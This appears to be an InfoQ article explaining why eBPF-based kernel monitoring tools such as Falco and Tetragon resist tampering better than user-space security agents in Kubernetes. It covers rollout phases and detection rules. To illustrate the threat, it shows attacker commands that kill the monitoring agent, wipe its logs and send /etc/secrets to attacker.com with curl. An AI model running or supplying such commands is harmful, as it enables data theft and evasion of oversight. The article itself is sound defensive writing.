InfoQ Homepage Articles Kernel-Level Ground Truth: Why eBPF is Replacing User-Space Agents for Security Observability

DevOps

Kernel-Level Ground Truth: Why eBPF is Replacing User-Space Agents for Security Observability

May 19, 2026 9 min read

Write for InfoQ

Feed your curiosity. Help 550k+ global
senior developers
each month stay ahead.Get in touch

Listen to this article - 0:00

Key Takeaways

Application-level logging depends on the cooperation of the process being monitored. A compromised process can kill its own watchdog, rewrite logs, or simply skip generating them. Your security visibility should not hinge on an attacker's willingness to be observed.
eBPF attaches probes directly to the Linux kernel's syscall interface, giving you visibility that persists even when an attacker has root inside a container. Disabling an eBPF probe requires escaping to the host kernel, which is a far harder problem than running kill -9.
Replacing a stack of user-space security agents with a single eBPF-based agent can cut security-related CPU consumption by 60-80%, and the telemetry volume drops sharply because filtering happens in the kernel instead of in a SIEM you are paying per-GB for.
Roll out eBPF security in phases: observe first, alert second, enforce last. Skipping straight to enforcement is how you get paged at 3 AM because a detection rule killed your payment service.
Falco (CNCF graduated) and Tetragon (Cilium sub-project) are production-ready today. You do not need to write kernel code to get started.

Introduction

Last year I was looking into a post-mortem from an incident where a container breakout went completely undetected in a production Kubernetes cluster. The security team pulled up dashboards, scrolled through logs, and found nothing useful. Turns out the attacker had killed the logging sidecar as a first move. Everything that happened after that was invisible.

The attack itself was not particularly clever. The monitoring stack just had a structural weakness baked in: the agent shared user space with the thing it was supposed to watch. Root in the container meant kill -9 on the agent, truncate on the log files, and then free rein. Fileless payloads via memfd_create() never touched the filesystem. Process injection hid behind trusted PIDs. The logging layer was the softest target in the whole setup.

That write-up got me digging into eBPF seriously. Every process, malicious or not, has to cross the syscall boundary to open files, connect to the network, or spawn children. eBPF lets you instrument that boundary inside the kernel itself, where a container-level attacker simply cannot reach it.

This article covers the architecture behind eBPF-based security monitoring, how to roll it out without breaking production, the cost story at scale, and which tools are worth your time right now.

The Problem with User-Space Security Agents

Living at the Same Privilege Level as the Threat

Most Kubernetes security monitoring runs as sidecar containers or DaemonSets, basically user-space processes sitting alongside the workloads they watch.

Figure 1: Traditional sidecar-based security monitoring. The agent shares the same privilege boundary as the workloads it monitors. (Original diagram by the author)

This architecture has a fundamental issue: the security agent and the attacker operate at the same level. With root in the container, an attacker can:

$ kill -9 $(pgrep security-agent)
$ truncate -s 0 /var/log/agent/*.log
$ curl http://attacker.com/exfil -d @/etc/secrets

No alert ever fires because the agent was dead before anything interesting happened.

The CPU Tax

User-space agents also impose real cost. To inspect network traffic they proxy connections through themselves, which means every packet crosses the user-kernel boundary multiple times. Add log serialization, parsing, and transmission on top, and it is easy to lose a meaningful slice of cluster CPU to security overhead alone. I have seen clusters where the monitoring stack consumed more resources than several of the services it was protecting.

What Attackers Know

Capable adversaries specifically target these gaps. memfd_create() lets code execute from memory without ever touching the filesystem, so file integrity monitors see nothing. Process injection hides behind trusted binaries the agent already ignores. Log evasion exploits the window between malicious activity and log shipment to delete evidence. The monitoring layer is the first thing a skilled attacker takes out, and the current architecture makes that easy.

How eBPF Changes the Equation

The Short Version

eBPF lets you run sandboxed programs inside the Linux kernel without writing a kernel module. Originally a packet filtering mechanism (hence "Berkeley Packet Filter"), the modern extended version is a general-purpose kernel instrumentation framework. Three things matter for security:

A built-in verifier statically analyzes every eBPF program at load time, proving it cannot crash the kernel, access unauthorized memory, or loop forever. If verification fails, the program never runs. Zero runtime cost, zero risk of a kernel panic.
eBPF programs execute in kernel context with direct access to kernel data structures. No user-kernel context switches, no proxy overhead.
You can attach probes to thousands of kernel functions, syscalls, network events, and tracepoints.

The Verifier Deserves Its Own Paragraph

Running custom code in the kernel makes people nervous, and with kernel modules that nervousness is justified. A buggy module can panic the machine. eBPF's verifier removes that failure mode entirely. It walks every possible execution path through the bytecode and checks termination guarantees, memory bounds, function call restrictions, and stack depth (capped at 512 bytes). All statically, all before the program loads.

The verifier is strict on purpose. It will reject programs that are actually safe but too complex for it to prove correct. Anyone who has worked with eBPF has hit this. You end up restructuring perfectly valid code just to satisfy the verifier. But that conservatism is why Meta, Google, and Netflix run eBPF in their production kernels at massive scale.

Where the Probes Sit

For security, eBPF programs attach at the syscall interface, the boundary every process must cross for privileged operations.

Figure 2: eBPF probes sit at the syscall interface. Every process, including an attacker's, must cross this boundary. (Original diagram by the author)

When any process calls connect(), execve(), or open(), the probe captures the syscall arguments, process/thread IDs, container ID, Kubernetes pod metadata, user ID, capabilities, and the parent process chain. Because the probe runs in kernel context, an attacker with root inside a container would need to escape to the host kernel to tamper with it. That is a completely different class of problem compared to killing a user-space process.

The Cost Story

Organizations that have replaced a multi-agent user-space security stack with a single eBPF-based agent report CPU reductions of 60-80% on security workloads.

Figure 3: Overhead comparison between user-space security agents and eBPF kernel-level monitoring. (Original diagram by the author)

There is a data volume angle too. User-space agents ship every log line, connection event, and file access to a centralized platform where most of it gets thrown away after ingestion. With eBPF the filtering happens in the kernel, so only events that actually matter leave the node. The SIEM ingestion cost reduction varies, but for most workloads it is substantial.

Kernel Compatibility

The features that matter for production security landed across kernels 4.15 through 5.7:

Feature	Minimum Kernel	Description
Basic tracing	4.1	kprobes, uprobes
Syscall tracing	4.6	Tracepoint-based syscall monitoring
Container awareness	4.15	cgroup-based filtering
BTF (type information)	5.2	Portable eBPF programs
bpf_send_signal	5.3	Process termination from eBPF
LSM hooks	5.7	Security policy enforcement

Most production Kubernetes distributions ship with 5.4+, so kernel support is rarely a blocker. Worth checking your specific nodes, but I have not run into a kernel version problem on any reasonably current distribution.

Rolling It Out Without Breaking Production

Do not skip straight to enforcement. That path leads to false positives killing production processes and a very awkward post-mortem.

Figure 4: Phased rollout: observe, alert, then enforce. Base progression on confidence, not calendar dates. (Original diagram by the author)

Phase 1: Watch and Learn

Deploy an eBPF agent (Falco or Tetragon) as a DaemonSet in passive mode. The agent observes all syscalls but blocks nothing. You need host-level access and kernel debug mounts:


spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: agent
    image: falcosecurity/falco-no-driver:latest
    securityContext:
      privileged: true
    volumeMounts:
    - name: bpf-fs
      mountPath: /sys/fs/bpf
    - name: kernel-debug
      mountPath: /sys/kernel/debug
      readOnly: true

Falco's Helm chart handles the full DaemonSet config. For a first deployment, start there.

During this phase, you are building baselines: which binaries each service runs, what network connections it establishes, what files it touches, what the normal process tree looks like. Stream events to cheap archival storage, not your real-time analytics platform. Move to the next phase once your baselines are stable across a few deployment cycles.

Phase 2: Alert on Anomalies

Now write detection rules against the baselines. This is behavioral detection, not signature matching. You are looking for deviations from what you know is normal.

A Falco rule for unexpected process execution in a payment service:


- rule: Unexpected Process in Payment Service
  desc: Detect execution of binaries not in the approved list
  condition: >
    spawned_process and
    container.name startswith "payment-" and
    not proc.name in (java, jcmd, jstat)
  output: >
    Unexpected process executed in payment container
    (user=%user.name container=%container.name 
     process=%proc.name cmdline=%proc.cmdline
     parent=%proc.pname)
  priority: WARNING
  tags: [container, process, payment]

And one for metadata service access, which is almost always a sign of trouble:


- rule: Container Accessing Cloud Metadata Service
  desc: Detect attempts to access instance metadata
  condition: >
    outbound and
    fd.sip = "169.254.169.254" and
    container.id != host
  output: >
    Container attempted metadata service access
    (container=%container.name pod=%k8s.pod.name
     namespace=%k8s.ns.name dest=%fd.sip)
  priority: CRITICAL
  tags: [network, cloud, metadata]

Spend real time tuning during this phase. Review every alert, understand the false positives, suppress the known-good patterns. Move to enforcement only once the alert volume is manageable and you have validated rules against known attack scenarios.

Phase 3: Enforce

With high confidence in your detection rules, enable active blocking. Tetragon can use bpf_send_signal() to SIGKILL a process before the offending syscall completes. Response time is measured in microseconds, not the minutes or hours of a traditional IR workflow.

A typical enforcement scenario: a container calls connect() to 169.254.169.254, the eBPF probe intercepts it, policy evaluation flags a violation, SIGKILL fires, the syscall never completes, and the alert goes out. The metadata service was never reached.

This phase demands discipline. A false positive that kills a legitimate process is a production outage. The observation and alerting phases exist specifically to build enough confidence that enforcement does not become a liability.

Tooling: Falco, Tetragon, and the Vendors

Falco is where I would start for most teams. It is a CNCF graduated project with a big community, active development, and years of production mileage. It hooks into the syscall interface via eBPF and evaluates events against a YAML-based rule engine. The default ruleset maps to MITRE ATT&CK and covers reverse shells, container escapes, sensitive path access, and more.

What I find most valuable about Falco is the Kubernetes context it attaches to events. The difference between "process X called connect() to 169.254.169.254" and "the payment-api pod in prod namespace tried to reach the cloud metadata service" is the difference between fifteen minutes of cross-referencing and an immediately actionable alert.

For active enforcement, where you need to kill a process before a malicious syscall completes, look at Tetragon. It is a Cilium sub-project and applies policy synchronously in the kernel. The trade-off is a smaller community and tighter coupling to the Cilium stack. Commercial vendors like Sysdig, Datadog, and Wiz have also rebuilt their agents on eBPF. If you already use one of them, check what eBPF capabilities you have before adding another tool.

Securing the eBPF Deployment Itself

eBPF programs run in the kernel with elevated privileges, so do not hand-wave the deployment security. Loading programs requires CAP_BPF (or CAP_SYS_ADMIN on kernels before 5.8). Start with a privileged container if you must, then tighten to the minimum capabilities, usually CAP_BPF, CAP_PERFMON, and CAP_SYS_RESOURCE. Beyond that:

Lock down which service accounts can deploy elevated-capability containers
Use admission controllers (OPA Gatekeeper, Kyverno) to confine privileged workloads to the security namespace
Monitor that namespace for unauthorized changes
Pin agent images to verified digests, not mutable tags

The verifier handles bytecode safety. Operational safety is on you.

Conclusion

Application-level logging is not going away. You still need it for debugging business logic and tracing requests through service meshes. But for security, where the adversary's first move is to disable your instrumentation, you need monitoring at a layer they cannot easily reach.

eBPF gives you that. Syscall-level visibility that persists regardless of what the application does, instrumentation that lives in the kernel where container-level compromise cannot touch it, and overhead that is a fraction of what user-space agents impose.

If you want to see it for yourself: deploy Falco on a staging cluster in observation-only mode. Spend thirty minutes looking at the events it captures. The gap between what your current monitoring shows and what eBPF reveals at the syscall level will make the case better than anything I can write here. And if you are already running eBPF-based security in production, share what you have learned. There is not nearly enough real-world operational knowledge circulating in this space.

About the Author

Niranjan Sharma

Show moreShow less

InfoQ Software Architects' Newsletter